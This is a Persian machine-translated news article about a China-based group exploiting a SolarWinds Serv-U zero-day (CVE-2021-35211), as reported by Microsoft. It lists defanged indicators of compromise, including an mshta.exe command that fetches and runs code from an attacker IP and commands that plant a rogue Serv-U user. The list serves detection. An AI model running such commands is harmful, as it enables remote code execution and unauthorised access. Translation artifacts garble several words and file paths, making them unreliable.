[ad_1]

SolarWinds 0-day دسترسی ممتاز به سرورهای سرویس گیرنده به هکرهای چینی داد

گتی ایماژ

مایکروسافت روز سه شنبه گفت هکرهایی که در چین کار می کنند از یک آسیب پذیری روز صفر در یک محصول SolarWinds سو explo استفاده کردند. به گفته مایکروسافت ، هکرها به احتمال زیاد توسط شرکت های نرم افزاری و صنایع دفاعی ایالات متحده مورد هدف قرار گرفته اند.

SolarWinds روز دوشنبه پس از دریافت اخطار از طرف مایکروسافت اعلام کرد که متوجه شده است یک آسیب پذیری ناشناخته قبلی در خط تولید SolarWinds Serv-U فعال است. SolarWinds مستقر در آستین ، تگزاس هیچ جزئیاتی در مورد تهدید این بازیگر در پشت حملات یا نحوه عملکرد حمله آنها ارائه نداد.

VPN تجاری و روترهای کاربر در معرض خطر

روز سه شنبه ، مایکروسافت گفت که در حال حاضر گروه هکرها را به عنوان “DEV-0322” شناسایی کرده است. “DEV” به “گروه مطالعه” اطلاق می شود که قبلاً هنگامی که محققان مایکروسافت به منشا or یا هویت شخصی که در عمل عمل می کند اطمینان زیادی دارند ، مورد مطالعه قرار می گیرد. این شرکت گفت مهاجمان از نظر فیزیکی در چین واقع شده اند و اغلب به بات نت هایی متشکل از روترها یا انواع دیگر دستگاه های اینترنت اشیا اعتماد می کنند.

محققان مرکز اطلاعات تهدید مایکروسافت در بیانیه ای گفتند: “MSTIC سایت های هدف گیری DEV-0322 را در صنعت دفاعی و شرکت های نرم افزاری ایالات متحده رصد کرده است.” “این گروه از فعالیت ها در چین مستقر است و با استفاده از راه حل های VPN تجاری و مسیریاب های کاربر به خطر افتاده در زیرساخت های حمله کننده آنها کنترل می شود.”

علاوه بر سه سرور مربوط به مهاجمان که قبلا توسط SolarWinds شناسایی شده اند ، مایکروسافت سه نشانگر اضافی ارائه داده است که افراد می توانند برای تعیین هک شدن آنها استفاده کنند. شاخص های سازش عبارتند از:

  • 98[.]176[.]196[.]89
  • 68[.]235[.]178[.]32
  • 208[.]113[.]35[.]58
  • 144[.]34[.]179[.]162
  • 97[.]77[.]97[.]58
  • hxxp: // 144[.]34[.]179[.]162 / a
  • C: Windows Temp Serv-U.bat
  • C: Windows Temp test current.dmp
  • وجود خطاهای مشکوک در یک استثنا ، به ویژه در پرونده ورود به سیستم DebugSocketlog.txt
  • C: Windows System32 mshta.exe http: // 144[.]34[.]179[.]162 / a (دفاعی)
  • cmd.exe / c whoami> “./Client/Common/redacted.txt”
  • cmd.exe / c dir> „. Client Common redacted.txt “
  • cmd.exe / c “C: Windows Temp Serv-U.bat”
  • PowerShell.exe C: Windows Temp Serv-U.bat
  • cmd.exe / c type \ redacted redacted.Archive> “C: ProgramData RhinoSoft Serv-U Users Global Users redacted.Archive”

پست روز سه شنبه همچنین جزئیات فنی جدیدی در مورد حمله ارائه می دهد. به خصوص:

مشاهده کردیم که DEV-0322 خروجی دستورات cmd.exe خود را به پرونده های موجود در پوشه Serv-U Client Common ارسال می کند که به طور پیش فرض از اینترنت قابل دسترسی است تا مهاجمان بتوانند نتایج دستورات را بازیابی کنند. همچنین مشخص شده است که بازیگر با ایجاد دستی ایجاد یک پرونده .Archive ایجاد شده در فهرست کاربران جهانی ، کاربر جهانی جدیدی را به Serv-U اضافه می کند. اطلاعات کاربر Serv-U در این پرونده های بایگانی ذخیره می شود.

با توجه به نحوه نوشتن کد DEV-0322 ، هنگامی که بهره برداری با موفقیت روند Serv-U را به خطر می اندازد ، یک استثنا در پرونده ورود به سیستم Serv-U ، DebugSocketLog.txt ایجاد و ثبت می شود. این فرایند همچنین می تواند پس از اجرای یک دستور مخرب خراب شود.

از طریق بررسی تله متری ، ویژگی های بهره برداری را شناسایی کردیم ، اما آسیب پذیری علت اصلی را تشخیص ندادیم. MSTIC در حال کار با تیم تحقیقات تهاجمی امنیت مایکروسافت برای بررسی آسیب پذیری باینری Serv-U و شناسایی آسیب پذیری از طریق تجزیه و تحلیل جعبه سیاه است. پس از شناسایی علت اصلی ، ما این آسیب پذیری را به SolarWinds گزارش دادیم ، که سریعاً برای درک مشکل و رفع مشکل پاسخ داد.

آسیب پذیری روز صفر که به صورت CVE-2021-35211 دنبال می شود ، در محصول Serv-U SolarWinds یافت می شود که مشتریان از آن برای انتقال پرونده ها از طریق شبکه استفاده می کنند. وقتی Serv-U SSH در معرض اینترنت قرار می گیرد ، سو explo استفاده ها به مهاجمین اجازه می دهد تا از راه دور کد مخرب را با امتیازات بالای سیستم اجرا کنند. از آنجا ، مهاجمان می توانند بارهای مخرب را نصب و اجرا کنند یا داده ها را مشاهده و اصلاح کنند.

SolarWinds یکشنبه در اواخر دسامبر هنگامی که محققان دریافتند این مرکز در حمله به زنجیره تأمین جهانی قرار دارد ، به یک نام خانوادگی تبدیل شد. پس از به خطر انداختن سیستم توسعه نرم افزار SolarWinds ، مهاجمان از دسترسی خود برای مجبور کردن به روزرسانی مخرب در حدود 18000 مشتری از ابزار مدیریت شبکه Orion شرکت استفاده کردند.

از این 18000 مشتری ، حدود 9 نفر از آنها در سازمان های دولتی ایالات متحده و حدود 100 نفر از آنها در صنعت خصوصی ، بدافزار بعدی را دریافت کردند. دولت فدرال این حملات را به سرویس اطلاعات خارجی روسیه نسبت می دهد که مخفف آن SVR است. برای بیش از یک دهه ، SVR کمپین های بدافزاری را با هدف هدف قرار دادن دولت ها ، اندیشکده های سیاسی و سازمان های دیگر در سراسر جهان اجرا کرده است.

حملات روز صفر که مایکروسافت کشف و گزارش کرد مربوط به حمله زنجیره تأمین جبار نبود.

SolarWinds آسیب پذیری آخر هفته را برطرف کرد. هر کسی که نسخه آسیب پذیر Serv-U را اجرا می کند ، باید فوراً به روز شود و علائم سازش را بررسی کند.

[ad_2]

منبع: tarjome-news.ir